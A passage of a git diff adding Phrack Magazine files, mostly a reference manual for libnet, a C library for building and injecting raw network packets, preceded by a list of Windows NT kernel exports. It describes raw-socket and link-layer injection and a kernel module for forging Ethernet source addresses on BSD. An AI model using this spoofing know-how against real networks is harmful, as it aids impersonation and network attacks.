+IoDriverObjectType
+IoEnqueueIrp
+IoFastQueryNetworkAttributes
+IofCallDriver
+IofCompleteRequest
+IoFileObjectType
+IoFreeController
+IoFreeIrp
+IoFreeMdl
+IoGetAttachedDevice
+IoGetBaseFileSystemDeviceObject
+IoGetConfigurationInformation
+IoGetCurrentProcess
+IoGetDeviceObjectPointer
+IoGetDeviceToVerify
+IoGetFileObjectGenericMapping
+IoGetInitialStack
+IoGetRelatedDeviceObject
+IoGetRequestorProcess
+IoGetStackLimits
+IoGetTopLevelIrp
+IoInitializeIrp
+IoInitializeTimer
+IoIsOperationSynchronous
+IoIsSystemThread
+IoMakeAssociatedIrp
+IoOpenDeviceInstanceKey
+IoPageRead
+IoQueryDeviceDescription
+IoQueryDeviceEnumInfo
+IoQueryFileInformation
+IoQueryVolumeInformation
+IoQueueThreadIrp
+IoRaiseHardError
+IoRaiseInformationalHardError
+IoReadOperationCount
+IoReadTransferCount
+IoRegisterDriverReinitialization
+IoRegisterFileSystem
+IoRegisterFsRegistrationChange
+IoRegisterShutdownNotification
+IoReleaseCancelSpinLock
+IoReleaseVpbSpinLock
+IoRemoveShareAccess
+IoReportHalResourceUsage
+IoReportResourceUsage
+IoSetDeviceToVerify
+IoSetHardErrorOrVerifyDevice
+IoSetInformation
+IoSetShareAccess
+IoSetThreadHardErrorMode
+IoSetTopLevelIrp
+IoStartNextPacket
+IoStartNextPacketByKey
+IoStartPacket
+IoStartTimer
+IoStatisticsLock
+IoStopTimer
+IoSynchronousPageWrite
+IoThreadToProcess
+IoUnregisterFileSystem
+IoUnregisterFsRegistrationChange
+IoUnregisterShutdownNotification
+IoUpdateShareAccess
+IoVerifyVolume
+IoWriteErrorLogEntry
+IoWriteOperationCount
+IoWriteTransferCount
+
+Here are the exported functions for the LSA:
+LsaCallAuthenticationPackage
+LsaDeregisterLogonProcess
+LsaFreeReturnBuffer
+LsaLogonUser
+LsaLookupAuthenticationPackage
+LsaRegisterLogonProcess
+
+The only imports are from the HAL DLL:
+HAL.ExAcquireFastMutex
+HAL.ExReleaseFastMutex
+HAL.ExTryToAcquireFastMutex
+HAL.HalAllocateAdapterChannel
+HAL.HalBeginSystemInterrupt
+HAL.HalClearSoftwareInterrupt
+HAL.HalDisableSystemInterrupt
+HAL.HalDisplayString
+HAL.HalEnableSystemInterrupt
+HAL.HalEndSystemInterrupt
+HAL.HalGetEnvironmentVariable
+HAL.HalHandleNMI
+HAL.HalProcessorIdle
+HAL.HalQueryDisplayParameters
+HAL.HalRequestSoftwareInterrupt
+HAL.HalReturnToFirmware
+HAL.HalSetEnvironmentVariable
+HAL.HalSetRealTimeClock
+HAL.HalStartProfileInterrupt
+HAL.HalStopProfileInterrupt
+HAL.HalSystemVectorDispatchEntry
+HAL.KdPortPollByte
+HAL.KdPortRestore
+HAL.KdPortSave
+HAL.KeGetCurrentIrql
+HAL.KeLowerIrql
+HAL.KeRaiseIrql
+HAL.KeRaiseIrqlToDpcLevel
+HAL.KeRaiseIrqlToSynchLevel
+HAL.KfAcquireSpinLock
+HAL.KfLowerIrql
+HAL.KfRaiseIrql
+HAL.KfReleaseSpinLock
+HAL.READ_PORT_UCHAR
+HAL.READ_PORT_ULONG
+HAL.READ_PORT_USHORT
+HAL.WRITE_PORT_UCHAR
+HAL.WRITE_PORT_ULONG
+HAL.WRITE_PORT_USHORT
+
+----[  EOF
diff --git a/phrack55/6.txt b/phrack55/6.txt
new file mode 100644
index 0000000..66c9a83
--- /dev/null
+++ b/phrack55/6.txt
@@ -0,0 +1,4380 @@
+-------[  Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 06 of 19  ]
+
+
+-------------------------[  The Libnet Reference Manual v.01  ]
+
+
+--------[  route <route@infonexus.com>  ]
+
+
+----[ 1]  Impetus
+
+If you are required to write C code (either by vocation or hobby) that at
+some point, must inject packets into a network, and the traditionally
+provided system APIs are insufficient, libnet is for you.  Libnet provides
+a simple API to quickly build portable programs that write network packets.
+
+Libnet was written for two main reasons.  1) To establish a simple interface
+by which network programmers could ignore the subtleties and nuances of
+low-level network programming (and therefore concentrate on writing their
+programs).  2) To mitigate the irritation many network programmers experienced
+due to the lack of standards.
+
+To be honest, I can't believe someone didn't write something like libnet 
+(also termed "libpwrite") a long time ago.  It seemed like such an obvious
+gap that needed to be filled. I was sure the LBNL guys (Lawrence Berkeley
+National Laboratory -- they wrote libpcap[1]) would put something together.
+I mean, Libnet, simply put, is the packet injector analog to libpcap.  They
+are brothers (or sisters).
+
+To sum it up, this is a treatise on the art of manufacturing network packets
+in an efficient, consistent and portable manner using libnet.
+
+Libnet in and of itself, has nothing to do with security.  However, libnet
+is a wonderful utility for writing security-related applications, tools
+and modules.  Many recent exploits have been rapidly developed using libnet as
+have many security related tools.  Take a look at the libnet projects URL
+section below for some examples.
+
+
+----[ 2]  Overview
+
+Libnet is a simple C library.  It is designed to be small, efficient and
+easy to use.  Libnet's main goal is portable packet creation and injection.
+At the time this manual was written, Libnet was in version 0.99f and had 15
+different packet assemblers and two types of packet injection, IP-layer and
+link-layer (more on those below).
+
+By itself, libnet is moderately useful.  It can build and inject packets to
+the network.  Libnet, however, has no provisions for packet capture.  For
+this, one must look to libpcap.  Together, libnet and libpcap are powerful
+tools available to the network programmer.
+
+Libnet consists of about:
+    - 7300 lines of code
+    - 32 source files
+    - 5 include files
+    - ~54 functions
+    - ~43 user-accessable / implemented functions
+
+
+----[ 3]  Design Decisions (past, present and future)
+
+Libnet is very much an ongoing learning/research project.  When I started
+it over a year and a half ago, I had no idea it would grow as it did
+incorporating as much functionality as it does.  Libnet's design has changed
+not so much in stages, but rather in evolutions.  Many of these evolutionary
+changes I took from other successful libraries out there.  Some of the changes
+are hard to pass and are still in progress, while some were just simple
+internal changes.  Then there were some modifications to the library that
+unfortunately changed the interface and obsoleted older versions.  In this
+section I hope enlighten the reader as to some of the design decisions that go
+into libnet; where it was, where it is, and where it's going.
+
+
+Modularity (interfaces and implementations)
+-------------------------------------------
+Big programs are made up of many modules [3].  These modules provide the user
+with functions and data structures that are to be used in a program.  A module
+comes in two parts: its interface and its implementation.  The interface
+specifies what a module does, while the implementation specifies how the
+module does it.  The interface declares all of the data types, function
+prototypes, global information, macros, or whatever is required by the module.
+The implementation adheres to the specifications set forth by the interface.
+This is how libnet was and is designed.  Each implementation, you'll find,
+has a corresponding interface.
+
+There is a third piece of this puzzle: the client.  The client is the piece
+of code that imports and employs the interface, without having to even see
+the implementation.  Your code is the client.
+
+For more information on interfaces and implementations in C, I urge the reader
+to check out [3].  It's an excellent book that changed the way I wrote code.
+
+
+Nomenclature
+------------
+Initially, the naming of files, functions and other tidbits didn't seem to
+be that important.  They took on whatever names seemed appropriate at the
+time.  In a stand-alone program, this is bad style.  In a library, it's bad
+style AND potentially error-prone.  Library code is intended to be used on
+different platforms and potentially with other libraries.  If one of these
+other libraries (or potentially the user's code) contains an object with the
+same name, problems result.  Therefore, naming has become an important issue
+to me.  A strict naming convention helps in two major areas:
+
+    - for filenames it keeps them ordered in a directory making for easy
+      perusal
+    - for function names, macros, and symbols it cuts down on redefinition
+      problems and makes the interface much easier to learn
+
+
+Error Handling and Reporting
+----------------------------
+Error handling and reporting is an essential part of any programming
+paradigm.  Delicate handling of and recovery from error conditions is an
+absolute necessity, especially in a third party library.  I believe Libnet
+now has decent error handling (see below for a dissertation on assertions).
+It can recover from most bad situations more or less gracefully.  It
+checks for illegal conditions under most circumstances.  Reporting, however,
+is a different story and is still progressing.  Libnet needs to have a standard 
+error reporting convention in place.  As it stands now, some functions use
+errno  (since they are basically system call wrappers), while some accept
+an additional buffer argument to hold potentional error messages, and still
+others as yet have no provision for verbose error reporting.  This needs to
+change and possibly might be accomplished using variable argument lists.
+
+
+Assertions and Exit Points
+--------------------------
+assert(3) is a macro that accepts a single argument which it treats as an
+expression, evaluating it for truth.  If the expression is evaluated to be
+false, the assert macro prints an error message and aborts (terminates) the
+program.  Assertions are useful in the developmental stages of programs when
+verbose error handling is not in place or when a grievous error condition
+that normally should not happen occurs.  Initially libnet was riddled with
+assertions.  Libnet mainly  employed assertions to catch NULL pointer
+dereferences before they occurred (many libnet functions accept pointer
+arguments expecting them to actually point somewhere).  This seemed reasonable
+at the time because this is obviously a grievous error -- if you're passing a
+NULL pointer when you shouldn't, your program is probably going to crash.
+However, assertions also riddled the library with numerous potential
+unpredictable exit points.  Exit points inside a supplementary library such as
+libnet are bad style, let alone unpredictable exit points.  Library code should
+not cause or allow a program to exit.  If a grievous error condition is
+detected, the library should return error codes to the main, and let it decide
+what to do. Code should be able to handle grievous errors well enough to be
+able to exit gracefully from the top level (if possible).  In any event, the
+assertions were removed in version 0.99f in favor of error indicative return
+values.  This preserves compatibility, while removing the exit points.
+
+
+IPv4 vs IPv6
+------------
+Libnet currently only supports IPv4.  Support for IPv6 is definitely
+planned, however.  The main consideration is nomenclature.  Had I been
+mister-cool-smart guy in the beggining, I would have anticipated this and
+added IP version information to the function names and macros e.g.:
+ipv4_build_ip, IPV4_H.  However at this point, I refuse to force users to
+adopt to yet another interface, so the IPv6 functions and macros will contain
+IPv6 in the name (much like the POSIX 1.g sockets interface [2]).
+
+
+The Configure Script
+--------------------
+Early on in the development of libnet, it became clear that there was much
+OS and architecture dependent code that had to conditionally included and
+compiled.  The autoconf configuration stuff (circa version 0.7) worked great to
+determine what needed to be included and excluded in order to build the
+library, but did nothing for post-install support.  Many of these CPP macros
+were needed to conditionally include header information for user-based code.
+This was initially handled by relying on the user to define the proper macros,
+but this quickly proved inefficient.
+
+Libnet now employs a simple configure script.  This script is created during
+autoconf configuration and is installed when the library is installed.  It
+handles all of the OS and architecture dependencies automatically - however,
+it is now mandatory to use it.  You will not be able to compile libnet-based
+code without.  See the next section for details on how to invoke the script.
+
+
+----[ 4]  A Means to an Ends
+
+This section covers operational issues including how to employ the library in
+a useful manner as well noting some of its quirks.
+
+
+The Order of Operations
+-----------------------
+In order to build and inject an arbitrary network packet, there is a standard
+order of operations to be followed.  There are five easy steps to packet
+injection happiness:
+
+    1) Network initialization
+    2) Memory initialization
+    3) Packet construction
+    4) Packet checksums
+    5) Packet injection
+
+Each one of these is an important topic and is covered below.
+
+
+Memory allocation and initialization 
+------------------------------------
+The first step in using libnet is to allocate memory for a packet.  The
+conventional way to do this is via a call to libnet_init_packet().  You just
+need to make sure you specify enough memory for whatever packet you're going
+to build.  This will also require some forthought as to which injection method
+you're going to use (see below for more information).  If you're going to
+build a simple TCP packet (sans options) with a 30 byte payload using the
+IP-layer interface, you'll need 70 bytes (IP header + TCP header + payload).
+If you're going to build the same packet using the link-layer interface, you'll
+need 84 bytes (ethernet header + IP header + TCP header + payload).  To be
+safe you can simply allocate IP_MAXPACKET bytes (65535) and not worry about
+overwriting buffer boundries.  When finished with the memory, it should be
+released with a call to libnet_destroy_packet() (this can either be in a
+garbage collection function or at the end of the program).
+
+Another method of memory allocation is via the arena interface.  Arenas are
+basically memory pools that allocate large chunks of memory in one call,
+divy out chunks as needed, then deallocate the whole pool when done.  The
+libnet arena interface is useful when you want to preload different kinds
+of packets that you're potentially going to be writing in rapid succession.
+It is initialized with a call to libnet_init_packet_arena() and chunks are
+retrieved with libnet_next_packet_from_arena().  When finished with the memory
+it should be released with a call to libnet_destroy_packet_arena() (this can
+either be in a garbage collection function or at the end of the program).
+
+An important note regarding memory management and packet construction:  If you
+do not allocate enough memory for the type of packet you're building, your
+program will probably segfault on you.  Libnet can detect when you haven't
+passed *any* memory, but not when you haven't passed enough.  Take heed.
+
+
+Network initialization 
+----------------------
+The next step is to bring up the network injection interface.  With the
+IP-layer interface, this is with a call to libnet_open_raw_sock() with the
+appropriate protocol (usually IPPROTO_RAW).  This call will return a raw
+socket with IP_HDRINCL set on the socket telling the kernel you're going
+to build the IP header.
+
+The link-layer interface is brought up with a call to
+libnet_open_link_interface() with the proper device argument.  This will
+return a pointer to a ready to go link interface structure.
+
+
+Packet construction
+-------------------
+Packets are constructed modularly.  For each protocol layer, there should
+be a corresponding call to a libnet_build function.  Depending on your
+end goal, different things may happen here.  For the above IP-layer example,
+calls to libnet_build_ip() and libnet_build_tcp() will be made.  For the
+link-layer example, an additional call to libnet_build_ethernet() will be
+made.  The ordering of the packet constructor function calls is not important,
+it is only important that the correct memory locations be passed to these
+functions.  The functions need to build the packet headers inside the buffer
+as they would appear on the wire and be demultiplexed by the recipient.
+For example:
+
+        14 bytes          20 bytes             20 bytes
+    __________________________________________________________
+    |   ethernet   |         IP         |         TCP        |
+    |______________|____________________|____________________|
+
+libnet_build_ethernet() would be passed the whole buffer (as it needs to build
+an ethernet header at the front of the packet).  libnet_build_ip() would get
+the buffer 14 bytes (ETH_H) beyond this to construct the IP header in the
+correct location, while libnet_build_tcp() would get the buffer 20 bytes
+beyond this (or 34 bytes beyond the beginning (ETH_H + IP_H)).  This is
+easily apparent in the example code.
+
+
+Packet checksums
+----------------
+The next-to-last step is computing the packet checksums (assuming the packet
+is an IP packet of some sort).  For the IP-layer interface, we need only
+compute a transport layer checksum (assuming our packet has a transport
+layer protocol) as the kernel will handle our IP checksum.  For the link-layer
+interface, the IP checksum must be explicitly computed.  Checksums are
+calculated via libnet_do_checksum(), which will be expecting the buffer passed
+to point to the IP header of the packet.
+
+
+Packet injection
+----------------
+The last step is to write the packet to the network.  Using the IP-layer
+interface this is accomplished with libnet_write_ip(), and with the link-layer
+interface it is accomplished with libnet_write_link_layer().  The functions
+return the number of bytes written (which should jive with the size of your
+packet) or a -1 on error.
+
+
+Using the Configure Script
+--------------------------
+There has been some confusion on how to correctly implement the
+libnet-configure shell script.  Since 0.99e, it has become mandatory to use
+this script.  The library will not compile code without it.  This is to avoid
+potential problems when user code is compiled with improper or missing CPP
+macros.  The script also has provisions for specifiing libraries and cflags.
+The library switch is useful on architectures that require additional
+libraries to compile network code (such as Solaris).  The script is very
+simple to use.  The following examples should dispell any confusion:
+
+    At the command line you can run the script to see what defines are
+    used for that system:
+
+    shattered:~> libnet-config --defines
+    -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H
+    -DLIBNET_LIL_ENDIAN
+
+    shattered:~> gcc -Wall `libnet-config --defines` foo.c -o foo
+                 `libnet-config --libs`
+
+    In a Makefile:
+
+    DEFINES =   `libnet-config --defines`
+
+    In a Makefile.in (also employing autoheader):
+
+    DEFINES =   `libnet-config --defines` @DEFS@
+
+
+IP-layer vs. Link-layer
+-----------------------
+People often wonder when to use the link-layer interface in place of the
+IP-layer interface.  It's mainly trading of power and complexity for ease of
+use.  The link-layer interface is slightly more complex and requires more
+coding.  It's also more powerful and is a lot more portable (if you want
+to build ARP/RARP/ethernet frames it's the only way to go).  It is basically
+a matter of what you need to get done.
+
+One major issue with the link-layer interface is that in order to send packets
+to arbirtrary remote Internet hosts, it needs to know the MAC address of the
+first hop router.  This is accomplished via ARP packets, but if proxy ARP
+isn't being done, you run into all kinds of problems determining whose MAC
+address to request.  Code to portably alleviate this problem is being
+developed.
+
+
+Spoofing Ethernet Addresses
+---------------------------
+Certain operating systems (specifically ones that use the Berkeley Packet
+Filter for link-layer access) do not allow for arbitrary specification of
+source ethernet addresses.  This is not so much a bug as it is an oversight
+in the protocol.  The way around this is to patch the kernel.  There are two
+ways to patch a kernel, either statically, with kernel diffs (which requires
+the individual to have the kernel sources, and know how to rebuild and install
+a new kernel) or dynamically, with loadable kernel modules (lkms).  Since it's
+a bit overzealous to assume people will want to patch their kernel for a
+library, included with the libnet distribution is lkm code to seamlessly
+bypass the bpf restriction.
+
+In order to spoof ethernet packets on bpf-based systems (currently supported
+are FreeBSD and OpenBSD) do the following: cd to the proper support/bpf-lkm/
+directory, build the module, and modload it.
+
+The module works as per the following description:
+
+The 4.4BSD machine-independent ethernet driver does not allow upper layers
+to forge the ethernet source address; all ethernet outputs cause the output
+routine to build a new ethernet header, and the process that does this
+explicitly copies the MAC address registered to the interface into this header.
+
+This is odd, because the bpf writing convention asserts that writes to bpf
+must include a link-layer header; it's intuitive to assume that this header
+is, along with the rest of the packet data, written to the wire.
+
+This is not the case. The link-layer header is used solely by the
+bpf code in order to build a sockaddr structure that is passed to the generic
+ethernet output routine; the header is then effectively stripped off the
+packet. The ethernet output routine consults this sockaddr to obtain the
+ethernet type and destination address, but not the source address.   
+
+The Libnet lkm simply replaces the standard ethernet output routine with a
+slightly modified one.  This modified version retrieves the source ethernet
+address from the sockaddr and uses it as the source address for the header
+written the wire. This allows bpf to be used to seamlessly forge ethernet
+packets in their entirety, which has applications in address management.
+
+The modload glue provided traverses the global list of system interfaces,
+and replaces any pointer to the original ethernet output routine with the
+new one we've provided. The unload glue undoes this. The effect of loading
+this module will be that all ethernet interfaces on the system will support
+source address forging.      
+
+Thomas H. Ptacek wrote the first version of this lkm in 1997.
+
+
+Raw Sockets Limitations
+-----------------------
+Raw sockets are horribly non-standard across different platforms.
+
+- Under some x86 BSD implementations the IP header length and fragmentation
+  bits need to be in host byte order, and under others, network byte order.
+
+- Solaris does not allow you to set many IP header related bits including
+  the length, fragmentation flags, or IP options.
+
+- Linux, on the other hand, seems to allow the setting of any bits to any
+  value (the exception being the IP header checksum, which is always done
+  by the kernel -- regardless of OS type).
+
+Because of these quirks, unless your code isn't designed to be multi-platform,
+you should use libnet's link-layer interface instead.
+
+
+----[ 5]  Internals
+
+Libnet can be broken down into 4 basic sections:  memory management, address
+resolution, packet handling, and support.  In this section we cover every
+user-accessible function libnet has to offer.
+
+Proceeding each function prototype is a small reference chart listing the
+return values of the function, whether or not the function is reentrant (a
+function is considered reentrant if it may be called repeatedly, or may be
+called before previous invocations have completed, and each invocation is
+independent of all other invocations) and a brief description of the function's
+arguments.
+
+If you're wondering, yes, this is basically a verbose manpage, however, much of
+it is new and additional verbiage, supplemental to the existing manual page.
+
+
+Memory Management Functions
+---------------------------
+
+int libnet_init_packet(u_short, u_char **);
+
+    RV on success:  1
+    RV on failure:  -1
+    Re-entrant:     yes
+    Arguments:      1 - desired packet size
+                    2 - pointer to a character pointer to contain packet memory
+
+
+    libnet_init_packet() creates memory for a packet.  Well, it doesn't so much
+    create memory as it requests it from the OS.  It does, however, make
+    certain the memory is zero-filled.  The function accepts two arguments, the
+    packet size and the address of the pointer to the packet.  The packet size
+    parameter may be 0, in which case the library will attempt to guess a
+    packet size for you.  The pointer to a pointer is necessary as we are
+    allocating memory locally.  If we simply pass in a pointer (even though
+    we are passing in an address, we are referencing the value as a pointer --
+    so in essence we would be passing by value) the memory will be lost.  If
+    we pass by address, we will retain the requested heap memory.
+
+    This function is a good example of interface hiding.  This function is
+    essentially a malloc() wrapper.  By using this function the details of
+    what's really happening are abstracted so that you, the programmer, can 
+    worry about your task at hand.
+
+
+void libnet_destroy_packet(u_char **);
+
+    RV on success:  NA
+    RV on failure:  NA
+    Reentrant:      yes
+    Arguments:      1 - pointer to a character pointer to containing packet
+                        memory
+
+    libnet_destroy_packet() is the free() analog to libnet_init_packet.  It
+    destroys the packet referenced by 'buf'.  In reality, it is of course a 
+    simple free() wrapper.  It frees the heap memory and points `buf` to NULL
+    to dispel the dangling pointer.  The function does make the assertion that
+    `buf` is not NULL.  A pointer to a pointer is passed to maintain
+    interface consistency.
+
+
+int libnet_init_packet_arena(struct libnet_arena **, u_short, u_short);
+
+    RV on success:  1
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - pointer to an arena pointer (preallocated arena)
+                    2 - number of packets
+                    3 - packet size
+
+    libnet_init_packet_arena() allocates and initializes a memory pool.
+    If you plan on building and sending several different packets, this is
+    a good choice.  It allocates a pool of memory from which you can grab
+    chunks to build packets (see next_packet_from_arena()).  It takes the
+    address to an arena structure pointer, and  hints on the possible packet
+    size and number of packets.  The last two arguments are used to compute
+    the size of the memory pool.  As before, they can be set to 0 and the
+    library will attempt to choose a decent value.  The function returns -1
+    if the malloc fails or 1 if everything goes ok.
+
+
+u_char *libnet_next_packet_from_arena(struct libnet_arena **, u_short);
+
+    RV on success:  pointer to the requested packet memory
+    RV on failure:  NULL
+    Reentrant:      yes
+    Arguments:      1 - pointer to an arena pointer
+                    2 - requested packet size
+
+    libnet_next_packet_from_arena() returns a chunk of memory from the
+    specified arena of the requested size and decrements the available
+    byte counter.  If the requested memory is not available from the arena, the
+    function returns NULL.  Note that there is nothing preventing a poorly
+    coded application from using more memory than requested and causing
+    all kinds of problems.  Take heed.
+
+
+void libnet_destroy_packet_arena(struct libnet_arena **);
+
+    RV on success:  NA
+    RV on failure:  NA
+    Reentrant:      yes
+    Arguments:      1 - pointer to an arena pointer
+
+    libnet_destroy_packet_arena() frees the memory associated with the
+    specified arena.
+
+
+Address Resolution Functions
+----------------------------
+
+u_char *libnet_host_lookup(u_long, u_short);
+
+    RV on success:  human readable IP address
+    RV on failure:  NULL
+    Reentrant:      no
+    Arguments:      1 - network-byte ordered IP address
+                    2 - flag to specify whether or not to look up canonical
+                        hostnames (symbolic constant)
+
+    libnet_host_lookup() converts the supplied network-ordered (big-endian)
+    IP address into its human-readable counterpart.  If the usename flag is
+    LIBNET_RESOLVE, the function will attempt to resolve the IP address
+    (possibly incurring DNS traffic) and return a canonical hostname, otherwise
+    if it is LIBNET_DONT_RESOLVE (or if the lookup fails), the function returns
+    a dotted-decimal ASCII string.  This function is hopelessly non reentrant
+    as it uses static data.
+
+
+void libnet_host_lookup_r(u_long, u_short, u_char *);
+
+    RV on success:  NA
+    RV on failure:  NA
+    Reentrant:      maybe
+    Arguments:      1 - network-byte ordered IP address
+                    2 - flag to specify whether or not to look up canonical
+                        hostnames (symbolic constant)
+
+    libnet_host_lookup_r() is the planned reentrant version of the above
+    function.  As soon as reentrant network resolver libraries become
+    available, this function will likewise be reentrant.  An additional
+    argument of a buffer to store the converted (or resolved) IP address is
+    supplied by the user.
+
+
+u_long libnet_name_resolve(u_char *, u_short);
+
+    RV on success:  network-byte ordered IP address
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - human readable hostname
+                    2 - flag to specify whether or not to look up canonical
+                        hostnames (symbolic constant)
+
+    libnet_name_resolve() takes a NULL terminated ASCII string representation
+    of an IP address (dots and decimals or, if the usename flag is
+    LIBNET_RESOLVE, canonical hostname) and converts it into a network-ordered
+    (big-endian) unsigned long value.
+
+
+u_long libnet_get_ipaddr(struct link_int *, const u_char *, const u_char *);
+
+    RV on success:  requested IP address
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - pointer to a link interface structure
+                    2 - pointer to the device to query
+                    3 - pointer to a buf to contain a possible error message
+
+    libnet_get_ipaddr() returns the IP address of a specified network device.
+    The function takes a pointer to a link layer interface structure, a
+    pointer to the network device name, and an empty buffer to be used in case
+    of error.  Upon success the function returns the IP address of the
+    specified interface in network-byte order or 0 upon error (and errbuf will
+    contain a reason).
+
+
+struct ether_addr *libnet_get_hwaddr(struct link_int *, const u_char *,
+    const u_char *);
+
+    RV on success:  requested ethernet address (inside of struct ether_addr)
+    RV on failure:  NULL
+    Reentrant:      depends on architecture
+    Arguments:      1 - pointer to a link interface structure
+                    2 - pointer to the device to query
+                    3 - pointer to a buf to contain a possible error message
+
+    libnet_get_hwaddr() returns the hardware address of a specified network
+    device.  At the time of this writing, only ethernet is supported.
+    The function takes a pointer to a link layer interface structure, a
+    pointer to the network device name, and an empty buffer to be used in case
+    of error.  The function returns the MAC address of the specified interface
+    upon success or 0 upon error (and errbuf will contain a reason).
+
+
+Packet Handling Functions
+-------------------------
+
+int libnet_open_raw_sock(int);
+
+    RV on success:  opened socket file descriptor
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - protocol number of the desired socket-type (symbolic
+                        constant)
+
+    libnet_open_raw_sock() opens a raw IP socket of the specified protocol
+    type (supported types vary from system to system, but usually you'll want
+    to open an IPPROTO_RAW socket).  The function also sets the IP_HDRINCL
+    socket option. Returned is the socket file descriptor or -1 on error.  The
+    function can fail if either of the underlying calls to socket or setsockopt
+    fail.  Checking errno will reveal the reason for the error.
+
+
+int libnet_close_raw_sock(int);
+
+    RV on success:  1
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - socket file descriptor to be closed
+
+    libnet_close_raw_sock() will close the referenced raw socket.
+
+
+int libnet_select_device(struct sockaddr_in *, u_char **, u_char *);
+
+    RV on success:  1
+    RV on failure:  -1
+    Reentrant:      no
+    Arguments:      1 - preallocated sockaddr_in structure pointer
+                    2 - pointer to a char pointer containing the device
+                    3 - pointer to a buf to contain a possible error message
+
+    libnet_select_device() will run through the list of interfaces and select
+    one for use (ignoring the loopback device).  If the device argument
+    points to NULL (don't pass in a NULL pointer, the function expects a
+    pointer to a pointer, and C can't derefrence a NULL pointer) it will
+    try to fill it in with the first non-loopback device it finds, otherwise,
+    it will try to open the specified device.  If successful, 1 is returned
+    (and if device was NULL, it will now contain the device name which can
+    be used in libnet_*link*() type calls).  The function can fail for a
+    variety of reasons, including socket system call failures, ioctl failures,
+    if no interfaces are found, etc..  If such an error occurs, -1 is returned
+    and errbuf will contain a reason.
+    
+
+struct link_int *libnet_open_link_interface(char *, char *);
+
+RV on success:  filled in link-layer interface structure
+RV on failure:  NULL
+Reentrant:      yes
+Arguments:      1 - pointer to a char containing the device to open
+                2 - pointer to a buf to contain a possible error message
+
+    libnet_open_link_interface() opens a low-level packet interface.  This is
+    required in order to be able inject link layer frames.  Supplied is a
+    u_char pointer to the interface device name and a u_char pointer to an
+    error buffer.  Returned is a filled-in link_int structure or NULL on
+    error (with the error buffer containing the reason).  The function can
+    fail for a variety of reasons due to the fact that it is architecture
+    specific.
+
+
+int libnet_close_link_interface(struct link_int *);
+
+    RV on success:  1
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - pointer to a link interface structure to be closed
+
+    libnet_close_link_interface() closes an opened low-level packet interface.
+
+
+int libnet_write_ip(int, u_char *, int);
+
+    RV on success:  number of bytes written
+    RV on failure:  -1
+    Reentrant:      Yes
+    Arguments:      1 - socket file descriptor
+                    2 - pointer to the packet buffer containing an IP datagram
+                    3 - total packet size
+
+    libnet_write_ip() writes an IP packet to the network.  The first argument
+    is the socket created with a previous call to libnet_open_raw_sock, the
+    second is a pointer to a buffer containing a complete IP datagram, and
+    the third argument is the total packet size.  The function returns the
+    number of bytes written upon success or -1 on error (with errno containing
+    the reason).
+
+
+int libnet_write_link_layer(struct link_int *, const u_char *, u_char *, int);
+
+    RV on success:  number of bytes written
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - pointer to an opened link interface structure
+                    2 - pointer to the network device
+                    3 - pointer to the packet buffer
+                    4 - total packet size
+
+    libnet_write_link_layer() writes a link-layer frame to the network. The
+    first argument is a pointer to a filled-in libnet_link_int structure,
+    the next is a pointer to the network device, the third is the raw packet
+    and the last is the packet size.  Returned is the number of bytes written
+    or -1 on error.
+
+
+int libnet_do_checksum(u_char *, int, int);
+
+    RV on success:  1
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - pointer to the packet buffer
+                    2 - protocol number of packet type (symbolic constant)
+                    3 - total packet size
+
+    libnet_do_checksum() calculates the checksum for a packet.  The first
+    argument is a pointer to a fully built IP packet.  The second is the
+    transport protocol of the packet and the third is the packet length (not
+    including the IP header).  The function calculates the checksum for the
+    transport protocol and fills it in at the appropriate header location
+    (this function should be called only after a complete packet has been
+    built).
+
+    Note that when using raw sockets the IP checksum is always computed by
+    the kernel and does not need to done by the user.  When using the link
+    layer interface the IP checksum must be explicitly computed (in this
+    case, the protocol would be of type IPPROTO_IP and the size would include
+    IP_H).  The function returns 1 upon success or -1 if the protocol is of
+    an unsupported type.  Currently supported are:
+
+    Value           Description
+    ---------------------------
+    IPPROTO_TCP     TCP
+    IPPROTO_UDP     UDP
+    IPPROTO_ICMP    ICMP
+    IPPROTO_IGMP    IGMP
+    IPPROTO_IP      IP
+
+
+int libnet_build_arp(u_short, u_short, u_short, u_short, u_short, u_char *,
+    u_char *, u_char *, u_char *, const u_char *, int, u_char *);
+
+    RV on success:  1
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - hardware address format (ARPHRD_ETHER)
+                    2 - protocol address format
+                    3 - length of the hardware address
+                    4 - length of the protocol address
+                    5 - ARP operation type (symbolic constant)
+                    6 - sender's hardware address
+                    7 - sender's protocol address
+                    8 - target's hardware address
+                    9 - target's protocol address
+                    10 - pointer to packet payload
+                    11 - packet payload size
+                    12 - pointer to pre-allocated packet memory
+
+    libnet_build_arp() constructs an ARP (RARP) packet.  At this point in the
+    library, the function only builds ethernet/ARP packets, but this will be
+    easy enough to change (whenever I get around to it).  The first nine
+    arguments are standard ARP header arguments, with the last three being
+    standard libnet packet creation arguments.  The ARP operation type
+    should be one of the following symbolic types:
+
+    Value               Description
+    -------------------------------
+    ARPOP_REQUEST       ARP request
+    ARPOP_REPLY         ARP reply
+    ARPOP_REVREQUEST    RARP request
+    ARPOP_REVREPLY      RARP reply
+    ARPOP_INVREQUEST    request to identify peer
+    ARPOP_INVREPLY      reply identifying peer
+
+    All libnet packet creation functions contain the same three terminal
+    arguments: a pointer to an optional payload (or NULL if no payload is to
+    be included), the size of the payload in bytes (or 0 is no payload is
+    included) and most importantly, a pointer to a pre-allocated block of
+    memory (which must be large enough to accommodate the entire ARP packet).
+
+    The only way this (or any libnet_build) function will return an error is if
+    the memory which is supposed to be pre-allocated points to NULL.
+
+
+int libnet_build_dns(u_short, u_short, u_short, u_short, u_short, u_short,
+    const u_char *, int, u_char *);
+
+    RV on success:  1
+    RV on failure:  -1
+    Reentrant:      yes
+    Arguments:      1 - packet id
+                    2 - control flags
+                    3 - number of questions
+                    4 - number of answer resource records
+                    5 - number of authority resource records
+                    6 - number of additional resource records
